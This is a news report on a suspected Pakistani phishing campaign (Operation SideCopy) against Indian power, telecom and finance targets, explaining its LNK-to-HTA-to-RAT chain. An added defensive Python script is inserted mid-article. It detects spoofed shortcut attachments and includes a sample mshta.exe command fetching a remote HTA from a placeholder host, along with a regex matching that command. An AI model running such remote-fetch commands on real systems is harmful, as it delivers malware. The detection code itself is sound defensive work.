New Delhi [India] July 11 (ANI): According to a major cybersecurity company, a suspected Pakistani group has launched a state-of-the-art phishing attack on India’s sensitive infrastructure such as electricity, telecommunications and finance.
Pentapostagma reported that a cybersecurity consultant at Quick Heal Technologies said a suspected group in Pakistan had launched a wave of advanced phishing attacks targeting key Indian infrastructure such as electricity and telecommunications.
According to security consultants, the first intrusion chain begins with spear phishing emails (emails crafted to trick specific recipients into installing viruses, Trojan horses or other malware).
Pentapostagma reports that the emails are often made to appear to come from government agencies, with fake documents such as income tax (IT) returns attached, urging users to download and open them.
The company has discovered that the hackers create fake versions of websites commonly accessed by people working in the targeted organizations.
“The content of the email tries to guide the user to extract the attached zip archive. When extracted, the user sees a document file that is actually an LNK file with a spoofed extension. This is usually considered a shortcut,” the company said.
“When a user opens a document, the LNK payload is launched and malicious activity is launched in the background. A decoy document is presented to the user to make sure the user is not suspicious,” he said. LNK is a widely deployed Windows link format, typically used as a shortcut to launch a program or executable file.
“When the LNK file is launched, it downloads the HTA payload from the compromised domain and runs it via mshta.exe. This HTA file serves to display the decoy document to the user. In addition, it drops LimShell,” the consultant said. He added that most of the backdoors used in this campaign are a remote access tool (RAT), a trojan that allows the program’s owner to control the end user’s computer, and said it was a variant of the NJRat Trojan.
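The delivery chain described above (a zip archive carrying an LNK file with a spoofed document extension, followed by mshta.exe fetching a remote HTA) gives a defender two cheap checks: inspect archive attachments for shortcuts masquerading as documents, and flag process-creation events where mshta.exe is started with a remote URL. The Python below is an added example, not code from the article or from Quick Heal/Seqrite. The archive contents, hostnames and log lines are constructed here for illustration, and the key=value process-creation record format is an assumption rather than any particular product's output.

```python
import io
import re
import zipfile
from typing import List

# Document-looking extensions an attacker may place in front of ".lnk".
# Explorer never shows the ".lnk" extension, so "report.pdf.lnk" is
# displayed as "report.pdf" with a shortcut overlay that is easy to miss.
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".ppt", ".pptx"}

# Windows shortcut files start with a 4-byte header size of 0x4C.
LNK_MAGIC = b"\x4c\x00\x00\x00"


def suspicious_archive_members(zip_bytes: bytes) -> List[str]:
    """Return archive member names that are LNK files posing as documents.

    Two signals are used: a double extension such as ".pdf.lnk", and the LNK
    magic header on a member whose name does not end in ".lnk" at all.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            if name.endswith(".lnk"):
                stem = name[:-4]
                if any(stem.endswith(ext) for ext in DOC_EXTENSIONS):
                    findings.append(info.filename)
                continue
            # A shortcut renamed to hide ".lnk" entirely still carries the magic.
            with zf.open(info) as fh:
                head = fh.read(4)
            if head == LNK_MAGIC:
                findings.append(info.filename)
    return findings


# mshta.exe followed by an argument containing http:// or https://.
MSHTA_REMOTE = re.compile(r"mshta(\.exe)?\s+\S*https?://", re.IGNORECASE)


def flag_mshta_remote(log_lines: List[str]) -> List[str]:
    """Return process-creation records where mshta.exe loads a remote HTA."""
    return [line for line in log_lines if MSHTA_REMOTE.search(line)]


def build_sample_archive() -> bytes:
    """Constructed sample attachment (not a real phishing archive).

    Contains one fake shortcut with a spoofed document extension (only the
    LNK header bytes, not a working shortcut) and one harmless text file.
    """
    fake_lnk = LNK_MAGIC + b"\x00" * 72  # header size + zero-filled body
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("IT_Return_2021.pdf.lnk", fake_lnk)
        zf.writestr("readme.txt", b"plain text, nothing to see")
    return buf.getvalue()


# Constructed process-creation records in an assumed key=value layout.
SAMPLE_LOGS = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta.exe http://compromised-site.example/decoy.hta"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine="notepad.exe C:\\Users\\user\\notes.txt"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta.exe C:\\Tools\\local.hta"',
]


if __name__ == "__main__":
    for member in suspicious_archive_members(build_sample_archive()):
        print("suspicious archive member:", member)
    for record in flag_mshta_remote(SAMPLE_LOGS):
        print("mshta remote load:", record)
```

The local `mshta.exe C:\Tools\local.hta` record is deliberately left unflagged: the text describes the HTA being downloaded from a compromised domain, so the remote-URL condition is what separates this chain from ordinary local HTA use.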
Cybersecurity consultants have discovered that the command and control server is from Pakistan.
“A thorough analysis of the attack chain, command and control (C2) server communications and available telemetry data enabled Seqrite (the security consultant) researchers to identify compromised websites that were used to host the attack scripts and act as C2 servers.
“Further analysis of the data accessible from some of the C2 servers led Seqrite researchers to an IP address commonly found across the various C2 servers. In fact, this IP address turned out to be the first entry in many logs, and the corresponding system may have been used to test the attack before launching it.
Further investigation of the IP revealed that the provider of the IP address was Pakistan Telecommunication Company Limited.
“This revelation further strengthens the claim that Operation SideCopy, operated by the Transparent Tribe Group, is being conducted from Pakistan. The report further clarified the list of targets identified through the C2s analysed: the targets are the telecommunications, electricity and financial sectors.
“This may only be a subset of the targets, as there are some other C2s used in the Operation SideCopy APT, probably targeting other entities,” he said.
Seqrite warned government officials and is working with government officials to keep potential targets safe, Pentapostagma further reported. (ANI)